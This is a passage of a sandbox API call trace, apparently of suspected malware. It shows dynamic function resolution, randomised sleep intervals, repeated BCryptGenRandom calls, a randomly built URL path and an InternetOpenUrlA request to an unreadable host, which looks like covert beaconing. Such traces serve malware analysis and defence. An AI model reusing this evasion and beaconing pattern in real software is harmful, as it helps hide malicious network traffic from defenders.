lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0182.226] Sleep (dwMilliseconds=0x11c04) [0182.465] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.465] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0182.465] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.465] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0182.465] GetProcessHeap () returned 0x440000 [0182.465] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x64) returned 0x3a1b250 [0182.466] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.466] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0182.466] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.466] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b251, cbBuffer=0x17, dwFlags=0x2 | out: pbBuffer=0x3a1b251) returned 0x0 [0182.466] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.466] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.466] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.466] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.466] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.467] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.467] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.467] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.467] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.467] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.467] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.467] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.468] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.468] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.468] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.468] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.468] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.468] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.468] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.468] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.469] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.469] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.469] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.469] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0182.469] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.469] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.469] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.470] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0182.470] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.470] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.470] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.470] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.470] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.470] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0182.470] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.471] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0182.471] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.471] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b268, cbBuffer=0x23, dwFlags=0x2 | out: pbBuffer=0x3a1b268) returned 0x0 [0182.471] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.471] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0182.471] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.471] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.471] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.472] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0182.472] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.472] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.472] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.472] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0182.472] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.472] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0182.473] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.473] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.473] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.473] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.473] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.473] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.473] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.473] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0182.474] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.474] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.474] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.664] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.664] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.679] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.680] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.680] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0182.680] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.680] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0182.680] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.680] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.680] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.680] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.681] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.681] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.681] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.681] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.681] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.681] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.681] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.682] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.682] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.682] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0182.682] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.682] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0182.682] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.683] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.683] GetProcessHeap () returned 0x440000 [0182.683] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473b90 [0182.683] lstrcpyA (in: lpString1=0x473b90, lpString2="\x81\x03" | out: lpString1="\x81\x03") returned="\x81\x03" [0182.683] lstrcatA (in: lpString1="\x81\x03", lpString2="/ufuavyZemaxlex8b6jduT0/7b7z67ersWYv2nRmgKk68Kteeygkn10ChW/" | out: lpString1="\x81\x03/ufuavyZemaxlex8b6jduT0/7b7z67ersWYv2nRmgKk68Kteeygkn10ChW/") returned="\x81\x03/ufuavyZemaxlex8b6jduT0/7b7z67ersWYv2nRmgKk68Kteeygkn10ChW/" [0182.683] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0182.683] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x81\x03/ufuavyZemaxlex8b6jduT0/7b7z67ersWYv2nRmgKk68Kteeygkn10ChW/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0182.683] GetProcessHeap () returned 0x440000 [0182.683] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473b90 | out: hHeap=0x440000) returned 1 [0182.683] GetProcessHeap () returned 0x440000 [0182.683] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a1b250 | out: hHeap=0x440000) returned 1 [0182.683] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0182.684] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0182.684] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.684] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0182.684] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0182.684] Sleep (dwMilliseconds=0x160c8) [0182.878] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.878] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0182.879] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.879] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0182.879] GetProcessHeap () returned 0x440000 [0182.879] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x64) returned 0x3a1b250 [0182.879] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.881] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0182.882] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.882] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b251, cbBuffer=0x14, dwFlags=0x2 | out: pbBuffer=0x3a1b251) returned 0x0 [0182.882] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.882] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.882] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.882] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.882] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.882] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0182.883] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.883] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.883] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.883] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.883] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.883] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.884] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.884] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0182.884] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.884] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.884] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.884] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.884] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.884] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.885] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.885] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.885] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.885] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.885] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.885] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0182.885] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.885] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.886] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.886] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.886] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.886] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0182.886] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.886] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b265, cbBuffer=0x2a, dwFlags=0x2 | out: pbBuffer=0x3a1b265) returned 0x0 [0182.886] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.886] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0182.887] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.887] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.887] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.887] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0182.887] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.887] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.887] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.887] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.888] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.888] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.888] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.888] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0182.888] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.888] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.888] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.888] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0182.889] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.889] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.889] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.889] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.889] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.889] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.889] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.889] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.890] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.890] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.890] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.890] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.890] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.890] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.890] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.890] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.891] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.891] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0182.891] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0182.891] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0182.891] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") 